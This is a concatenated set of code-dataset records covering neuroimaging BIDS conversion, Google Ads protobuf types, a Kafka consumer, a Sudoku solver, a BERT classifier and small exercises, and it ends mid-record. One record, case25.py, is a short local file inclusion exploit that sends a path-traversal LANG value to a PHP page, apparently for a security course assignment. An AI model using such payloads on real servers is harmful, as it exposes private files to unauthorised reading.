checkGz(b))) \n elif n.find('GRE_3D_Sag_Spoiled')!=-1:\n print (n + ' Is Anat')\n shutil.move((fullPath + '/' + n), (fullPath + '/anat/' + n))\n os.rename(os.path.join(fullPath,'anat' , n), (fullPath + '/anat/' + subName+ '_' + session + '_acq-gre_spoiled_T1w' + checkGz(b))) \n elif n.find('bold')!=-1:\n print(n + ' Is functional')\n taskName = checkTask(n)\n shutil.move((fullPath + '/' + n), (fullPath + '/func/' + n))\n os.rename(os.path.join(fullPath, 'func', n), (fullPath + '/func/' +subName+'_' +session + '_task-' + taskName + '_bold' + checkGz(b)))\n else:\n print (n + 'Is MISC')\n shutil.move((fullPath + '/' + n), (fullPath + '/misc/' + n))\n # os.rename(os.path.join(fullPath, 'misc', n), (fullPath +'/misc/' +'sub-'+subName+'_ses-' +sessionNum + '_MISC' + checkGz(b)))\n \n# need to run thorugh misc folder and extract t1's when there is no MPRAGE - Need to solve issue with t1 - as adding the names is not validated with BIDS\n\n# %%\nsessionDict = {\n 'ses-1': '/media/Data/Lab_Projects/R_A_ID/neuroimaging/raw_dicom/pc1079_levy/',\n #'ses-2': '/media/Data/Lab_Projects/KPE_PTSD_Project/neuroimaging/raw_dicom/kpe1587/kpe1587_scan2_pb10759_harpaz-rotem',\n #'ses-3': '/media/Data/Lab_Projects/neurofeedback/neuroimaging/raw_scan_data/NF1551/nf1551_scan3_pb9903',\n#'ses-4': '/media/Data/Lab_Projects/neurofeedback/neuroimaging/raw_scan_data/NF1551/nf1551_scan4_pb9940',\n }\nsubNumber = '1079'\ndef fullBids(subNumber, sessionDict):\n output_dir = '/media/Data/Lab_Projects/R_A_ID/neuroimaging/R_A_ID_BIDS/'\n subName = 'sub-' + subNumber\n # folder_name = ['anat','func','dwi','other']\n \n for i in sessionDict:\n session = i\n source_dir = sessionDict[i]\n print (session, source_dir)\n fullPath = os.path.join(output_dir, subName, session)\n print(fullPath)\n convert(source_dir, output_dir, subName, session)\n organizeFiles(output_dir, subName, session) \n \n \n #print (v)\n# %%\nfullBids(subNumber, sessionDict)\n\n# %%\n\n","sub_path":"convertBIDS/creatBIDS_R_Aid.py","file_name":"creatBIDS_R_Aid.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"10691402","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom __future__ import annotations\n\nfrom typing import MutableSequence\n\nimport proto # type: ignore\n\nfrom google.ads.googleads.v14.enums.types import customer_match_upload_key_type\nfrom google.ads.googleads.v14.enums.types import user_list_crm_data_source_type\nfrom google.ads.googleads.v14.enums.types import (\n user_list_date_rule_item_operator,\n)\nfrom google.ads.googleads.v14.enums.types import (\n user_list_flexible_rule_operator,\n)\nfrom google.ads.googleads.v14.enums.types import user_list_logical_rule_operator\nfrom google.ads.googleads.v14.enums.types import (\n user_list_number_rule_item_operator,\n)\nfrom google.ads.googleads.v14.enums.types import user_list_prepopulation_status\nfrom google.ads.googleads.v14.enums.types import user_list_rule_type\nfrom google.ads.googleads.v14.enums.types import (\n user_list_string_rule_item_operator,\n)\n\n\n__protobuf__ = proto.module(\n package=\"google.ads.googleads.v14.common\",\n marshal=\"google.ads.googleads.v14\",\n manifest={\n \"SimilarUserListInfo\",\n \"CrmBasedUserListInfo\",\n \"UserListRuleInfo\",\n \"UserListRuleItemGroupInfo\",\n \"UserListRuleItemInfo\",\n \"UserListDateRuleItemInfo\",\n \"UserListNumberRuleItemInfo\",\n \"UserListStringRuleItemInfo\",\n \"FlexibleRuleOperandInfo\",\n \"FlexibleRuleUserListInfo\",\n \"RuleBasedUserListInfo\",\n \"LogicalUserListInfo\",\n \"UserListLogicalRuleInfo\",\n \"LogicalUserListOperandInfo\",\n \"BasicUserListInfo\",\n \"UserListActionInfo\",\n },\n)\n\n\nclass SimilarUserListInfo(proto.Message):\n r\"\"\"SimilarUserList is a list of users which are similar to users\n from another UserList. These lists are read-only and\n automatically created by Google.\n\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n seed_user_list (str):\n Seed UserList from which this list is\n derived.\n\n This field is a member of `oneof`_ ``_seed_user_list``.\n \"\"\"\n\n seed_user_list: str = proto.Field(\n proto.STRING,\n number=2,\n optional=True,\n )\n\n\nclass CrmBasedUserListInfo(proto.Message):\n r\"\"\"UserList of CRM users provided by the advertiser.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n app_id (str):\n A string that uniquely identifies a mobile\n application from which the data was collected.\n For iOS, the ID string is the 9 digit string\n that appears at the end of an App Store URL (for\n example, \"476943146\" for \"Flood-It! 2\" whose App\n Store link is\n http://itunes.apple.com/us/app/flood-it!-2/id476943146).\n For Android, the ID string is the application's\n package name (for example,\n \"com.labpixies.colordrips\" for \"Color Drips\"\n given Google Play link\n https://play.google.com/store/apps/details?id=com.labpixies.colordrips).\n Required when creating CrmBasedUserList for\n uploading mobile advertising IDs.\n\n This field is a member of `oneof`_ ``_app_id``.\n upload_key_type (google.ads.googleads.v14.enums.types.CustomerMatchUploadKeyTypeEnum.CustomerMatchUploadKeyType):\n Matching key type of the list.\n Mixed data types are not allowed on the same\n list. This field is required for an ADD\n operation.\n data_source_type (google.ads.googleads.v14.enums.types.UserListCrmDataSourceTypeEnum.UserListCrmDataSourceType):\n Data source of the list. Default value is FIRST_PARTY. Only\n customers on the allow-list can create third-party sourced\n CRM lists.\n \"\"\"\n\n app_id: str = proto.Field(\n proto.STRING,\n number=4,\n optional=True,\n )\n upload_key_type: customer_match_upload_key_type.CustomerMatchUploadKeyTypeEnum.CustomerMatchUploadKeyType = proto.Field(\n proto.ENUM,\n number=2,\n enum=customer_match_upload_key_type.CustomerMatchUploadKeyTypeEnum.CustomerMatchUploadKeyType,\n )\n data_source_type: user_list_crm_data_source_type.UserListCrmDataSourceTypeEnum.UserListCrmDataSourceType = proto.Field(\n proto.ENUM,\n number=3,\n enum=user_list_crm_data_source_type.UserListCrmDataSourceTypeEnum.UserListCrmDataSourceType,\n )\n\n\nclass UserListRuleInfo(proto.Message):\n r\"\"\"A client defined rule based on custom parameters sent by web\n sites or uploaded by the advertiser.\n\n Attributes:\n rule_type (google.ads.googleads.v14.enums.types.UserListRuleTypeEnum.UserListRuleType):\n Rule type is used to determine how to group\n rule items.\n The default is OR of ANDs (disjunctive normal\n form). That is, rule items will be ANDed\n together within rule item groups and the groups\n themselves will be ORed together.\n\n OR of ANDs is the only supported type for\n FlexibleRuleUserList.\n rule_item_groups (MutableSequence[google.ads.googleads.v14.common.types.UserListRuleItemGroupInfo]):\n List of rule item groups that defines this rule. Rule item\n groups are grouped together based on rule_type.\n \"\"\"\n\n rule_type: user_list_rule_type.UserListRuleTypeEnum.UserListRuleType = (\n proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_rule_type.UserListRuleTypeEnum.UserListRuleType,\n )\n )\n rule_item_groups: MutableSequence[\n \"UserListRuleItemGroupInfo\"\n ] = proto.RepeatedField(\n proto.MESSAGE,\n number=2,\n message=\"UserListRuleItemGroupInfo\",\n )\n\n\nclass UserListRuleItemGroupInfo(proto.Message):\n r\"\"\"A group of rule items.\n Attributes:\n rule_items (MutableSequence[google.ads.googleads.v14.common.types.UserListRuleItemInfo]):\n Rule items that will be grouped together based on rule_type.\n \"\"\"\n\n rule_items: MutableSequence[\"UserListRuleItemInfo\"] = proto.RepeatedField(\n proto.MESSAGE,\n number=1,\n message=\"UserListRuleItemInfo\",\n )\n\n\nclass UserListRuleItemInfo(proto.Message):\n r\"\"\"An atomic rule item.\n This message has `oneof`_ fields (mutually exclusive fields).\n For each oneof, at most one member field can be set at the same time.\n Setting any member of the oneof automatically clears all other\n members.\n\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n name (str):\n Rule variable name. It should match the corresponding key\n name fired by the pixel. A name must begin with US-ascii\n letters or underscore or UTF8 code that is greater than 127\n and consist of US-ascii letters or digits or underscore or\n UTF8 code that is greater than 127. For websites, there are\n two built-in variable URL (name = 'url__') and referrer URL\n (name = 'ref_url__'). This field must be populated when\n creating a new rule item.\n\n This field is a member of `oneof`_ ``_name``.\n number_rule_item (google.ads.googleads.v14.common.types.UserListNumberRuleItemInfo):\n An atomic rule item composed of a number\n operation.\n\n This field is a member of `oneof`_ ``rule_item``.\n string_rule_item (google.ads.googleads.v14.common.types.UserListStringRuleItemInfo):\n An atomic rule item composed of a string\n operation.\n\n This field is a member of `oneof`_ ``rule_item``.\n date_rule_item (google.ads.googleads.v14.common.types.UserListDateRuleItemInfo):\n An atomic rule item composed of a date\n operation.\n\n This field is a member of `oneof`_ ``rule_item``.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=5,\n optional=True,\n )\n number_rule_item: \"UserListNumberRuleItemInfo\" = proto.Field(\n proto.MESSAGE,\n number=2,\n oneof=\"rule_item\",\n message=\"UserListNumberRuleItemInfo\",\n )\n string_rule_item: \"UserListStringRuleItemInfo\" = proto.Field(\n proto.MESSAGE,\n number=3,\n oneof=\"rule_item\",\n message=\"UserListStringRuleItemInfo\",\n )\n date_rule_item: \"UserListDateRuleItemInfo\" = proto.Field(\n proto.MESSAGE,\n number=4,\n oneof=\"rule_item\",\n message=\"UserListDateRuleItemInfo\",\n )\n\n\nclass UserListDateRuleItemInfo(proto.Message):\n r\"\"\"A rule item composed of a date operation.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n operator (google.ads.googleads.v14.enums.types.UserListDateRuleItemOperatorEnum.UserListDateRuleItemOperator):\n Date comparison operator.\n This field is required and must be populated\n when creating new date rule item.\n value (str):\n String representing date value to be compared\n with the rule variable. Supported date format is\n YYYY-MM-DD. Times are reported in the customer's\n time zone.\n\n This field is a member of `oneof`_ ``_value``.\n offset_in_days (int):\n The relative date value of the right hand\n side denoted by number of days offset from now.\n The value field will override this field when\n both are present.\n\n This field is a member of `oneof`_ ``_offset_in_days``.\n \"\"\"\n\n operator: user_list_date_rule_item_operator.UserListDateRuleItemOperatorEnum.UserListDateRuleItemOperator = proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_date_rule_item_operator.UserListDateRuleItemOperatorEnum.UserListDateRuleItemOperator,\n )\n value: str = proto.Field(\n proto.STRING,\n number=4,\n optional=True,\n )\n offset_in_days: int = proto.Field(\n proto.INT64,\n number=5,\n optional=True,\n )\n\n\nclass UserListNumberRuleItemInfo(proto.Message):\n r\"\"\"A rule item composed of a number operation.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n operator (google.ads.googleads.v14.enums.types.UserListNumberRuleItemOperatorEnum.UserListNumberRuleItemOperator):\n Number comparison operator.\n This field is required and must be populated\n when creating a new number rule item.\n value (float):\n Number value to be compared with the\n variable. This field is required and must be\n populated when creating a new number rule item.\n\n This field is a member of `oneof`_ ``_value``.\n \"\"\"\n\n operator: user_list_number_rule_item_operator.UserListNumberRuleItemOperatorEnum.UserListNumberRuleItemOperator = proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_number_rule_item_operator.UserListNumberRuleItemOperatorEnum.UserListNumberRuleItemOperator,\n )\n value: float = proto.Field(\n proto.DOUBLE,\n number=3,\n optional=True,\n )\n\n\nclass UserListStringRuleItemInfo(proto.Message):\n r\"\"\"A rule item composed of a string operation.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n operator (google.ads.googleads.v14.enums.types.UserListStringRuleItemOperatorEnum.UserListStringRuleItemOperator):\n String comparison operator.\n This field is required and must be populated\n when creating a new string rule item.\n value (str):\n The right hand side of the string rule item.\n For URLs or referrer URLs, the value can not\n contain illegal URL chars such as newlines,\n quotes, tabs, or parentheses. This field is\n required and must be populated when creating a\n new string rule item.\n\n This field is a member of `oneof`_ ``_value``.\n \"\"\"\n\n operator: user_list_string_rule_item_operator.UserListStringRuleItemOperatorEnum.UserListStringRuleItemOperator = proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_string_rule_item_operator.UserListStringRuleItemOperatorEnum.UserListStringRuleItemOperator,\n )\n value: str = proto.Field(\n proto.STRING,\n number=3,\n optional=True,\n )\n\n\nclass FlexibleRuleOperandInfo(proto.Message):\n r\"\"\"Flexible rule that wraps the common rule and a lookback\n window.\n\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n rule (google.ads.googleads.v14.common.types.UserListRuleInfo):\n List of rule item groups that defines this\n rule. Rule item groups are grouped together.\n lookback_window_days (int):\n Lookback window for this rule in days. From\n now until X days ago.\n\n This field is a member of `oneof`_ ``_lookback_window_days``.\n \"\"\"\n\n rule: \"UserListRuleInfo\" = proto.Field(\n proto.MESSAGE,\n number=1,\n message=\"UserListRuleInfo\",\n )\n lookback_window_days: int = proto.Field(\n proto.INT64,\n number=2,\n optional=True,\n )\n\n\nclass FlexibleRuleUserListInfo(proto.Message):\n r\"\"\"Flexible rule representation of visitors with one or multiple\n actions. The flexible user list is defined by two lists of operands\n – inclusive_operands and exclusive_operands; each operand represents\n a set of users based on actions they took in a given timeframe.\n These lists of operands are combined with the AND_NOT operator, so\n that users represented by the inclusive operands are included in the\n user list, minus the users represented by the exclusive operands.\n\n Attributes:\n inclusive_rule_operator (google.ads.googleads.v14.enums.types.UserListFlexibleRuleOperatorEnum.UserListFlexibleRuleOperator):\n Operator that defines how the inclusive\n operands are combined.\n inclusive_operands (MutableSequence[google.ads.googleads.v14.common.types.FlexibleRuleOperandInfo]):\n Rules representing users that should be included in the user\n list. These are located on the left side of the AND_NOT\n operator, and joined together by either AND/OR as specified\n by the inclusive_rule_operator.\n exclusive_operands (MutableSequence[google.ads.googleads.v14.common.types.FlexibleRuleOperandInfo]):\n Rules representing users that should be excluded from the\n user list. These are located on the right side of the\n AND_NOT operator, and joined together by OR.\n \"\"\"\n\n inclusive_rule_operator: user_list_flexible_rule_operator.UserListFlexibleRuleOperatorEnum.UserListFlexibleRuleOperator = proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_flexible_rule_operator.UserListFlexibleRuleOperatorEnum.UserListFlexibleRuleOperator,\n )\n inclusive_operands: MutableSequence[\n \"FlexibleRuleOperandInfo\"\n ] = proto.RepeatedField(\n proto.MESSAGE,\n number=2,\n message=\"FlexibleRuleOperandInfo\",\n )\n exclusive_operands: MutableSequence[\n \"FlexibleRuleOperandInfo\"\n ] = proto.RepeatedField(\n proto.MESSAGE,\n number=3,\n message=\"FlexibleRuleOperandInfo\",\n )\n\n\nclass RuleBasedUserListInfo(proto.Message):\n r\"\"\"Representation of a userlist that is generated by a rule.\n Attributes:\n prepopulation_status (google.ads.googleads.v14.enums.types.UserListPrepopulationStatusEnum.UserListPrepopulationStatus):\n The status of pre-population. The field is\n default to NONE if not set which means the\n previous users will not be considered. If set to\n REQUESTED, past site visitors or app users who\n match the list definition will be included in\n the list (works on the Display Network only).\n This will only add past users from within the\n last 30 days, depending on the list's membership\n duration and the date when the remarketing tag\n is added. The status will be updated to FINISHED\n once request is processed, or FAILED if the\n request fails.\n flexible_rule_user_list (google.ads.googleads.v14.common.types.FlexibleRuleUserListInfo):\n Flexible rule representation of visitors with one or\n multiple actions. The flexible user list is defined by two\n lists of operands – inclusive_operands and\n exclusive_operands; each operand represents a set of users\n based on actions they took in a given timeframe. These lists\n of operands are combined with the AND_NOT operator, so that\n users represented by the inclusive operands are included in\n the user list, minus the users represented by the exclusive\n operands.\n \"\"\"\n\n prepopulation_status: user_list_prepopulation_status.UserListPrepopulationStatusEnum.UserListPrepopulationStatus = proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_prepopulation_status.UserListPrepopulationStatusEnum.UserListPrepopulationStatus,\n )\n flexible_rule_user_list: \"FlexibleRuleUserListInfo\" = proto.Field(\n proto.MESSAGE,\n number=5,\n message=\"FlexibleRuleUserListInfo\",\n )\n\n\nclass LogicalUserListInfo(proto.Message):\n r\"\"\"Represents a user list that is a custom combination of user\n lists.\n\n Attributes:\n rules (MutableSequence[google.ads.googleads.v14.common.types.UserListLogicalRuleInfo]):\n Logical list rules that define this user\n list. The rules are defined as a logical\n operator (ALL/ANY/NONE) and a list of user\n lists. All the rules are ANDed when they are\n evaluated.\n\n Required for creating a logical user list.\n \"\"\"\n\n rules: MutableSequence[\"UserListLogicalRuleInfo\"] = proto.RepeatedField(\n proto.MESSAGE,\n number=1,\n message=\"UserListLogicalRuleInfo\",\n )\n\n\nclass UserListLogicalRuleInfo(proto.Message):\n r\"\"\"A user list logical rule. A rule has a logical operator\n (and/or/not) and a list of user lists as operands.\n\n Attributes:\n operator (google.ads.googleads.v14.enums.types.UserListLogicalRuleOperatorEnum.UserListLogicalRuleOperator):\n The logical operator of the rule.\n rule_operands (MutableSequence[google.ads.googleads.v14.common.types.LogicalUserListOperandInfo]):\n The list of operands of the rule.\n \"\"\"\n\n operator: user_list_logical_rule_operator.UserListLogicalRuleOperatorEnum.UserListLogicalRuleOperator = proto.Field(\n proto.ENUM,\n number=1,\n enum=user_list_logical_rule_operator.UserListLogicalRuleOperatorEnum.UserListLogicalRuleOperator,\n )\n rule_operands: MutableSequence[\n \"LogicalUserListOperandInfo\"\n ] = proto.RepeatedField(\n proto.MESSAGE,\n number=2,\n message=\"LogicalUserListOperandInfo\",\n )\n\n\nclass LogicalUserListOperandInfo(proto.Message):\n r\"\"\"Operand of logical user list that consists of a user list.\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n user_list (str):\n Resource name of a user list as an operand.\n\n This field is a member of `oneof`_ ``_user_list``.\n \"\"\"\n\n user_list: str = proto.Field(\n proto.STRING,\n number=2,\n optional=True,\n )\n\n\nclass BasicUserListInfo(proto.Message):\n r\"\"\"User list targeting as a collection of conversions or\n remarketing actions.\n\n Attributes:\n actions (MutableSequence[google.ads.googleads.v14.common.types.UserListActionInfo]):\n Actions associated with this user list.\n \"\"\"\n\n actions: MutableSequence[\"UserListActionInfo\"] = proto.RepeatedField(\n proto.MESSAGE,\n number=1,\n message=\"UserListActionInfo\",\n )\n\n\nclass UserListActionInfo(proto.Message):\n r\"\"\"Represents an action type used for building remarketing user\n lists.\n\n This message has `oneof`_ fields (mutually exclusive fields).\n For each oneof, at most one member field can be set at the same time.\n Setting any member of the oneof automatically clears all other\n members.\n\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n conversion_action (str):\n A conversion action that's not generated from\n remarketing.\n\n This field is a member of `oneof`_ ``user_list_action``.\n remarketing_action (str):\n A remarketing action.\n\n This field is a member of `oneof`_ ``user_list_action``.\n \"\"\"\n\n conversion_action: str = proto.Field(\n proto.STRING,\n number=3,\n oneof=\"user_list_action\",\n )\n remarketing_action: str = proto.Field(\n proto.STRING,\n number=4,\n oneof=\"user_list_action\",\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n","sub_path":"google/ads/googleads/v14/common/types/user_lists.py","file_name":"user_lists.py","file_ext":"py","file_size_in_byte":22081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"34557205","text":"# -*- coding: UTF-8 -*-\n\"\"\"Comprehensions\"\"\"\n\nprice_strings = [\"24\", \"13\", \"16000\", \"1400\"]\nprice_nums = [int(price) for price in price_strings]\n\nfish = \"halibut\"\n\n# Comprehensions give handles on each element of a collection\nletters = [letter for letter in fish]\n\nprint(f\"We iterate over a string, containing the world: '{fish}'\")\nprint(f\"This turns our string into a list: {letters}.\")\n\n# We can manipulate each element as we go\ncapital_letters = [letter.upper() for letter in letters]\n\nprint(f\"This capitalizes the letters in our list: {capital_letters}.\")\n\n# We can remove elements with a boolean test\nno_h = [letter for letter in letters if letter != \"h\"]\ndysfunctional_fish = \"\".join(no_h)\n\nno_h_or_b = [letter for letter in letters if letter != \"h\" and letter != \"b\"]\ndysfunctional_fish = \"\".join(no_h_or_b)\n\nprint(f\"And our filtered string is: {dysfunctional_fish}.\")\nprint(\"=\" * 72)\n\njune_temperatures = [72, 65, 59, 87]\njuly_temperatures = [87, 85, 92, 79]\naugust_temperatures = [87, 77, 68, 72]\nsummer_temperatures = [june_temperatures, july_temperatures, august_temperatures]\n\n# We can use functions inside of list comprehensions\nlowest_summer_temperatures = [min(temps) for temps in summer_temperatures]\n\nprint(f\"The lowest temperature in June was: {lowest_summer_temperatures[0]}.\")\nprint(f\"The lowest temperature in July was: {lowest_summer_temperatures[1]}.\")\nprint(f\"The lowest temperature in August was: {lowest_summer_temperatures[-1]}.\")\n","sub_path":"03-Python/3/Activities/Solved/05-Ins_List_comprehensions/comprehensions.py","file_name":"comprehensions.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"243105392","text":"import time\nfrom kafka import KafkaConsumer, KafkaProducer\n\ndef sub(name):\n print(\"sub started\")\n consumer = KafkaConsumer('test', consumer_timeout_ms=7000)\n latency_list = []\n Append = latency_list.append\n\n for msg in consumer:\n # print(f\"Reader {name} arrived time {time.time()} and departure time {msg.timestamp}\")\n # print(\"msg arrived\")\n\n latency = time.time() - float(msg.value)\n print(latency)\n Append(latency)\n print(msg.value)\n\n print(\"latency average:\", sum(latency_list) / len(latency_list))\n\nif __name__ == '__main__':\n\n sub(\"reader1\")","sub_path":"kafka/kafka_sub_latency.py","file_name":"kafka_sub_latency.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"195082988","text":"import requests\nimport webbrowser\n\n# Exploit: change the LANG to ../lfi.txt.php and server will write file contents\n# to the webpage\n# Local File Inclusion\n\ndef main():\n temp = '/tmp/case25.html'\n payload = {'LANG':'../lfi.txt'}\n\n r = requests.post('http://wsb.com/Assignment2/case25.php', data=payload)\n with open(temp, 'wb') as f:\n f.write(r.content)\n webbrowser.open(temp, 2)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"case25.py","file_name":"case25.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"124896335","text":"from copy import deepcopy\n\n\ndef getCons( board , i , j ):\n\n masks = [True] * 10\n\n #horizontal\n for k in range(9):\n masks[ board[i][k] ] = False\n\n #vertical\n for k in range(9):\n masks[ board[k][j] ] = False\n\n istart = (i//3)*3\n jstart = (j//3)*3\n for k1 in range(istart,istart+3):\n for k2 in range(jstart,jstart+3):\n masks[ board[k1][k2] ] = False\n \n res = []\n for i in range(1,10):\n if masks[i]:\n res.append(i)\n return res\n\n\ndef solve( board , deepness = 0 ):\n\n res = deepcopy(board)\n while True:\n signal = explore( res )\n \n if signal == -1:\n return None\n elif signal == 0:\n break\n\n if not completeBoard(res):\n\n i,j = leastTrackbackPosition(res)\n possibleList = getCons(res,i,j)\n \n for x in possibleList:\n #print(\"Deepness:\",deepness,\"try\",x,\"in\",possibleList)\n res[i][j] = x\n \n deepres = solve( res , deepness + 1 )\n if deepres != None:\n #print(\"Deepness:\",deepness,\" Got solution!!!\")\n #printBoard(deepres)\n #print(\"return True in deepness\",deepness)\n return deepres\n\n #print(\"Deepness:\",deepness,\" Failed!!!\")\n return None\n\n else:\n #print(\"complete!!\")\n return res\n\n\ndef leastTrackbackPosition( board ):\n resi , resj = 0 , 0\n minNum = 9\n for i in range(9):\n for j in range(9):\n if board[i][j] == 0:\n tMinNum = len(getCons( board , i , j ))\n if tMinNum == 2:\n return i,j\n elif tMinNum < minNum:\n minNum = tMinNum\n resi,resj = i,j\n return resi,resj\n\n\ndef explore( board ):\n\n # 0 - no more unity solution\n # 1 - could explore more\n # -1 - no solution\n resCode = 0\n for i in range(9):\n for j in range(9):\n if board[i][j] == 0:\n\n #print(\"explore\",i,j)\n possibleList = getCons( board , i , j )\n if len(possibleList) == 1:\n board[i][j] = possibleList[0]\n resCode = 1\n elif len(possibleList) == 0:\n return -1\n \n return resCode\n\n\ndef completeBoard(board):\n for i in range(9):\n for j in range(9):\n if board[i][j] == 0:\n return False\n return True\n\n\ndef printBoard(board,debug=True):\n for i in range(9):\n print( \"\".join([str(x) for x in board[i]]) )\n if debug:\n print(\"=================\")\n\n \nif __name__ == \"__main__\":\n\n numBoard = []\n for _ in range(9):\n numBoard.append( [int(x) for x in input().strip()] )\n numBoard = solve( numBoard )\n printBoard( numBoard , debug = False )\n\n\n","sub_path":"ProjectEulerPlus/096-Sudoku_20150904.py","file_name":"096-Sudoku_20150904.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"594463498","text":"import torch\nfrom classifiers.standard.classifier import Classifier\nfrom classifiers.standard.bert_head import BertMeanPooling\nfrom torch import nn\nfrom torch.nn import CrossEntropyLoss\nfrom transformers import BertPreTrainedModel, BertModel\n\n\nclass BertMeanPoolClassifier(Classifier):\n def __init__(self, config):\n self.config = config\n self.model = BertModelMeanPooling.from_pretrained(self.config['pretrained_model'])\n\n self.optimizer = torch.optim.Adam(self.model.parameters(), self.config['learning_rate'])\n\n # here, we can do some layer removal if we want to\n self.epochs = 0\n\n print(self.model)\n\n##\n# In this model,\n# we take the final hidden state of all tokens apart from CLS and SEP.\n# And pool that.\n# To make it simple, we take the BertModel, and replace the Pooler with our own.\n##\n\n\nclass BertModelMeanPooling(BertPreTrainedModel):\n def __init__(self, config):\n super(BertModelMeanPooling, self).__init__(config)\n self.num_labels = config.num_labels\n\n self.bert = BertModel(config)\n\n # remove the pooling layer and replace with our own\n self.bert.pooler = BertMeanPooling(config)\n\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, self.config.num_labels)\n self.head = nn.Softmax(dim=1)\n self.init_weights()\n\n def forward(self, input_ids=None, attention_mask=None, token_type_ids=None,\n position_ids=None, head_mask=None, inputs_embeds=None, labels=None):\n\n outputs = self.bert(input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds)\n\n pooled_output = outputs[1]\n\n pooled_output = self.dropout(pooled_output)\n logits = self.classifier(pooled_output)\n logits = self.head(logits)\n outputs = (logits,) + outputs[2:] # add hidden states and attention if they are here\n\n if labels is not None:\n\n loss_fct = CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\n\n outputs = (loss,) + outputs\n\n return outputs # (loss), logits, (hidden_states), (attentions)","sub_path":"medicalbert/classifiers/standard/bert_mean_pool_classifier.py","file_name":"bert_mean_pool_classifier.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"449706852","text":"class Solution(object):\n def reverseWords(self, s):\n if not s:\n return \"\"\n arr = s.split(\" \")\n sb = \"\"\n for i in range(len(arr) - 1, -1, -1):\n if arr[i] != \"\":\n sb += arr[i]\n sb += \" \"\n return sb[: -1]\n","sub_path":"151/151.reverse-words-in-a-string.695940600.Accepted.leetcode.python3.py","file_name":"151.reverse-words-in-a-string.695940600.Accepted.leetcode.python3.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"365852373","text":"# 2021 카카오 채용연계형 인턴십 - 표 편집\n# heapq 라이브러리 사용해서 효율성 해결\nimport heapq\n\ndef solution(n, k, cmd):\n # 현재 위치:right heap의 첫 번째 원소\n\n left, right, delete = [], [], []\n # 왼쪽은 최대값이 맨 앞에 위치하도록, 오른쪽은 최솟값이 맨 앞에 위치하도록 heap을 구성한다.\n for i in range(n):\n heapq.heappush(right, i)\n for i in range(k):\n heapq.heappush(left, -heapq.heappop(right))\n\n for c in cmd:\n # U or D인 경우\n if len(c) > 1:\n move = int(c.split()[-1])\n # D(아래로)인 경우\n if c.startswith(\"D\"):\n for _ in range(move):\n # 오른쪽 heap에서 왼쪽 heap으로 값을 이동시킨다.\n if right:\n heapq.heappush(left, -heapq.heappop(right))\n\n # U(위로)인 경우\n elif c.startswith(\"U\"):\n for _ in range(move):\n # 왼쪽 heap에서 오른쪽 heap으로 값을 이동시킨다.\n heapq.heappush(right, -heapq.heappop(left))\n elif c == \"C\":\n # 값을 삭제하되, 가장 최근에 삭제된 값을 복구하기 쉽도록 stack 형태를 사용한다\n delete.append(heapq.heappop(right))\n\n # 삭제된 행이 가장 마지막 행인 경우 바로 윗 행을 선택하도록 한다.\n if not right:\n heapq.heappush(right, -heapq.heappop(left))\n elif c == \"Z\":\n # 삭제한 값 복구하기\n repair = delete.pop()\n\n # 현재 위치보다 값이 작을 경우 left에 넣는다\n if repair < right[0]:\n heapq.heappush(left, -repair)\n else:\n heapq.heappush(right, repair)\n result = []\n while left:\n 